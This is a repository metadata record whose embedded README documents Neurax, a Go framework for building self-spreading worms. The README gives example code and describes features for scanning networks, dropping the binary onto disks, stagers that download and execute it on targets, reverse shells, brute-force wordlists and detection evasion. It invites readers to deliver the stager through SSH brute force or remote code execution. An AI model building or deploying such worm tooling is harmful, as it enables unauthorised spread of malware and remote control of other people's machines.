{"id":13509763,"url":"https://github.com/redcode-labs/neurax","last_synced_at":"2025-04-09T10:04:44.687Z","repository":{"id":42530460,"uuid":"316504138","full_name":"redcode-labs/neurax","owner":"redcode-labs","description":"A framework for constructing self-spreading binaries","archived":false,"fork":false,"pushed_at":"2023-11-23T00:39:24.000Z","size":1690,"stargazers_count":1010,"open_issues_count":4,"forks_count":102,"subscribers_count":47,"default_branch":"master","last_synced_at":"2025-04-02T08:24:22.071Z","etag":null,"topics":["golang","malware","self-spreading","worm"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/redcode-labs.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-11-27T13:08:09.000Z","updated_at":"2025-03-31T08:27:27.000Z","dependencies_parsed_at":"2024-06-18T20:12:45.982Z","dependency_job_id":null,"html_url":"https://github.com/redcode-labs/neurax","commit_stats":{"total_commits":124,"total_committers":7,"mean_commits":"17.714285714285715","dds":"0.16935483870967738","last_synced_commit":"79d55d588a32af7d0900ebacbaef26f840c31618"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/redcode-labs%2Fneurax","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/redcode-labs%2Fneurax/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/redcode-labs%2Fneurax/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/redcode-labs%2Fneurax/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/redcode-labs","download_url":"https://codeload.github.com/redcode-labs/neurax/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248018060,"owners_count":21034048,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["golang","malware","self-spreading","worm"],"created_at":"2024-08-01T02:01:12.652Z","updated_at":"2025-04-09T10:04:44.636Z","avatar_url":"https://github.com/redcode-labs.png","language":"Go","funding_links":["https://paypal.me/redcodelabs?locale.x=pl_PL"],"categories":["Go","malware"],"sub_categories":[],"readme":"\u003cbr\u003e\u003c/br\u003e\n\u003cp align=\"center\"\u003e\n  \u003ca\u003e\n    \u003cimg alt=\"Neurax\" title=\"Neurax\" src=\"neurax.png\"\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\u003cbr\u003e\u003c/br\u003e\n\u003cp align=\"center\"\u003e A framework that aids in creation of self-spreading software\u003c/p\u003e\n\n\u003cbr\u003e\u003c/br\u003e\n\n## Overview\nWith help of Neurax, Golang binaries can spread on LAN/WAN without using any external servers.\n\nDiverse config options and command stagers allow rapid propagation across various wireless environments.\n\n\n## Example code\n\n```go\npackage main\nimport . \"github.com/redcode-labs/Neurax\"\n\nfunc main(){\n\n  //Specify serving port and stager to use\n  Nrx.Config.Port = 5555\n  Nrx.Config.Stager = \"wget\"\n\n  //Start a server that exposes the current binary in the background\n  go NeuraxServer()\n \n  //Copy current binary to all logical drives\n  NeuraxDisks()\n\n  //Create a command stager that should be launched on target machine\n  //It will download, decode and execute the binary\n  cmd_stager := NeuraxStager()\n\n  /* Now you have to somehow execute the command generated above.\n     You can use SSH bruteforce, some RCE or whatever else you want ;\u003e */\n\n}\n```\n\u003cbr\u003e\u003c/br\u003e\n## New in v. 2.X (separate sub-project)\n- Refactor: abandoned framework-like approach in favour of a ready-to-use binary\n- Generic wget stager for all UNIX targets\n- Single config file to tweak worm's behaviour on the fly\n- Automatic self-removal via `unlinkat(2)`\n- Example LinuxKI CVE exploit to supplement network spreading capabilities \n- JSON config file is downloaded and evaluated \n- Minimalistic re-write of host harvester \n\n## New in v. 2.5\n- Optional background execution of the second-stage binary (`N.StagerBg`)\n- Command stager saves and executes in context-local path \n- It also removes the downloaded binary right after successful execution\n- Removed synchronized command execution mechanism for speed/stability reasons.\nI will come up with a decent alternative prior to next release.\n- `N.NoInfectCheck` to disable checking if host is already infected.\n- Single-execution policy on target machine, enforced with an exclusive file mutex placed inside `NeuraxServer()`.\n- Added a nested goroutine for serving the binary\n- New `httrack` stager for Linux\n- Commented-out common wordlist for detection evasion\n- Command stager can wait before removing the binary (`N.StagerRemovalDelay`)\n\n## New in v. 2.0\n- New wordlist mutators + common passwords by country\n- Improvised passive scanning\n- `.FastScan` option that makes active scans a bit quicker\n- Wordlists are created strictly in-memory\n- `NeuraxScan()` accepts a callback function instead of channel as an argument.\n- `NeuraxScan()` scans in infinite loop with possibility to set interval between each scan of whole subnet/pool of targets\n- Reverse-DNS lookup for targets that are not in IP format\n- Extraction of target candidates from ARP cache\n- Possibility to scan only a selected list of targets + prioritizing specific targets (such as default gateways)\n- Possibility to specify interface and timeout when using passive network scan.\n- Improved command stager (can be optionally executed with elevated privileges / multiple times)\n- Few changes of options' names\n- `NeuraxConfig.` became `N.` (cause it's shorter to type)\n- Functions for random memory allocation + binary migration\n- Possibility to chain multiple stagers (ex. `wget` + `curl`)\n- Volume and complexity of created wordlist can be easily tuned (with options such as `.WordlistExpand`)\n- Possibility to set time-to-live of created binary\n\n\n### List of config entries\n\n\u003cspan style=\"color:#b45e02\"\u003eName\u003c/span\u003e | \u003cspan style=\"color:#5f1e2d\"\u003eDescription\u003c/span\u003e | \u003cspan style=\"color:#aa5502\"\u003eDefault value\u003c/span\u003e\n--- | --- | ---\nNrx.Config.Stager           | Name of the command stager to use | `random, platform-compatible`\nNrx.Config.StagerSudo       | If true, Linux cmd stagers are executed with elevated privilleges | `false`\nNrx.Config.StagerRetry      | Number of times to re-execute the command stager | `0`\nNrx.Config.StagerRemoveDelay      | Sleep instruction is applied before removing the downloaded binary | `true`\nNrx.Config.Port             | Port to serve on | `6741`\nNrx.Config.Platform         | Platform to target | `detected automatically`\nNrx.Config.Path             | The path under which binary is saved on the host | `.`\nNrx.Config.FileName        | Name under which downloaded binary should be served and then saved | `random`\nNrx.Config.Base64           | Encode the transferred binary in base64 | `false`\nNrx.Config.CommPort        | Port that is used by binaries to communicate with each other | `7777`\nNrx.Config.CommProto       | Protocol for communication between nodes | `\"udp\"`\nNrx.Config.ReverseListener | Contains `\"\u003chost\u003e:\u003cport\u003e\"` of remote reverse shell handler | `not specified`\nNrx.Config.ReverseProto    | Protocol to use for reverse connection | `\"udp\"`\nNrx.Config.ScanRequiredPort    | NeuraxScan() treats host as active only when it has a specific port opened| `none`\nNrx.Config.ScanPassive     | NeuraxScan() detects hosts using passive ARP traffic monitoring | `false`\nNrx.Config.ScanPassiveTimeout     | NeuraxScan() monitors ARP layer this amount of seconds | `50 seconds`\nNrx.Config.ScanPassiveIface     | Interface to use when scanning passively| `default`\nNrx.Config.ScanActiveTimeout     | NeuraxScan() sets this value as timeout for scanned port in each thread | `2 seconds`\nNrx.Config.ScanPassiveAll         | NeuraxScan() captures packets on all found devices | `false`\nNrx.Config.ScanPassiveNoArp | Passive scan doesn't set strict ARP capture filter | `false`\nNrx.Config.ScanFirst       | A slice containing IP addresses to scan first | `[]string{}`\nNrx.Config.ScanFirstOnly | NeuraxScan() scans only hosts specified within `.ScanFirst`| `false`\nNrx.Config.ScanArpCache   | NeuraxScan() scans first the hosts found in local ARP cache. Works only with active scan | `false`\nNrx.Config.ScanCidr             | NeuraxScan() scans this CIDR | `local IP + \"\\24\"`\nNrx.Config.ScanActiveThreads          | Number of threads to use for NeuraxScan() | `10`\nNrx.Config.ScanFullRange       | NeuraxScan() scans all ports of target host to determine if it is active | `from 19 to 300`\nNrx.Config.ScanInterval    | Time interval to sleep before scanning whole subnet again | `\"2m\"` \nNrx.Config.ScanHostInterval    | Time interval to sleep before scanning next host in active mode | `\"none\"` \nNrx.Config.ScanGatewayFirst | Gateway is the first host scanned when active scan is used | `false`\nNrx.Config.Verbose          | If true, all error messages are printed to STDOUT | `false`\nNrx.Config.Remove           | When any errors occur, binary removes itself from the host | `false`\nNrx.Config.PreventReexec   | If true, when any command matches with those that were already received before, it is not executed | `true`\nNrx.Config.WordlistExpand  | NeuraxWordlist() performs non-standard transformations on input words | false\nNrx.Config.WordlistCommon  | Prepend 20 most common passwords to wordlist | `false`\nNrx.Config.WordlistCommonNum | Number of common passwords to use | `all`\nNrx.Config.WordlistCommonCountries| A map[string]int that contains country codes and number of passwords to use| map[string]int\nNrx.Config.WordlistMutators | Mutators to use when `.WordlistExpand` is specified | `{\"single_upper\", \"cyryllic\", \"encapsule\"}`\nNrx.Config.WordlistPermuteNum | Maximum length of permutation generated by NeuraxWordlistPermute()| `2`\nNrx.Config.WordlistPermuteSeparator | A separator character to use for permutations | `\"-\"`\nNrx.Config.WordlistShuffle | Shuffle generated wordlist before returning it | `false`\nNrx.Config.AllocNum         | This entry defines how many times `NeuraxAlloc()` allocates random memory| `5`\nNrx.Config.Blacklist        | Slice that contains IP addresses that are excluded from any type of scanning | `[]string{}`\nNrx.Config.FastHTTP         | HTTP request in IsHostInfected() is performed using fasthttp library | `false`\nNrx.Config.Debug            | Enable debug messages | `false`\nNrx.Config.NoInfectCheck            | Disable checking if host is already infected | `true`\n\n### Finding new targets\nFunction `NeuraxScan(func(string))` enables detection of active hosts on local network.\nIt's only argument is a callback function that is called in background for every active host.\nHost is treated as active when it has at least 1 open port, is not already infected + fullfils conditions specified within `N.`\n\n`NeuraxScan()` runs as infinite loop - it scans whole subnet specified by `.Cidr` config entry and when every host is scanned, function sleeps for an interval given in `.ScanInterval`.\n\n### Disks infection\n  Neurax binary doesn't have to copy itself using wireless means.\n  Function `NeuraxDisks()` copies current binary (under non-suspicious name) to all logical drives that were found.\n  Copied binary is not executed, but simply resides in it's destination waiting to be run.\n  `NeuraxDisks()` returns an `error` if list of disks cannot be obtained or copying to any destination was impossible.\n\nAnother function, `NeuraxZIP(num_files int) err` allows to create a randomly named .zip archive containing current binary.\nIt is saved in current directory, and contains up to `num_files` random files it.\n\n`NeuraxZIPSelf()` simply zips the current binary, creating an archive holding the same name.\n\n### Reverse connections\nAn interactive reverse shell can be established with `NeuraxReverse()`.\nIt will receive commands from hostname specified inside `.ReverseListener` in a form of `\"\u003chost\u003e:\u003cport\u003e\"`.\nProtocol that is used is defined under `.ReverseProto`\nIf `NeuraxOpenComm()` was started before calling this function, each command will behave as described in above section.\nIf it was not, commands will be executed locally.\n\nNote: this function should be also runned as goroutine to prevent blocking caused by infinite loop used for receiving.\n\n### Cleaning up\nWhenever `\"purge\"` command is received by a node, it resends this command to all other nodes, removes itself from host and quits.\nThis behaviour can be also commenced using `NeuraxPurge()` executed somewhere in the source.\n\n### Wordlist creation\nIf spread vector of your choice is based on some kind of bruteforce, it is good to have a proper wordlist prepared. \nStoring words in a text-file on client side isn't really effective, so you can mutate a basic wordlist using `NeuraxWordlist(...words) []string`.\nTo permute a set of given words, use `NeuraxWordlistPermute(..words) []string`\n\n### Setting time-to-live \nIf you want your binary to remove itself after given time, use `NeuraxSetTTL()` at the beginnig of your code.\nThis function should be launched as a goroutine.\nFor example:\n\n`go NeuraxSetTTL(\"2m\")`\n\nwill make the binary run `NeuraxPurgeSelf()` after 2 minutes from initial execution.\n\n### Using multiple stagers at once\nIf you would like to chain all stagers available for given platform, set `.Stager` to `\"chain\"`.\n\n### Moving the dropped binary\nIf you need to copy the binary after initial execution, use `NeuraxMigrate(path string)`.\nIt will copy the binary under `path`, remove current binary and execute newly migrated one.\n\n\n## Support this tool\nIf you like this project and want to see it grow, please consider making a small donation :\u003e\n\n[ \u003e\u003e\u003e\u003e\u003e DONATE \u003c\u003c\u003c\u003c\u003c](https://paypal.me/redcodelabs?locale.x=pl_PL)\n\n## License\nThis software is under [MIT license](https://en.wikipedia.org/wiki/MIT_License)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fredcode-labs%2Fneurax","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fredcode-labs%2Fneurax","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fredcode-labs%2Fneurax/lists"}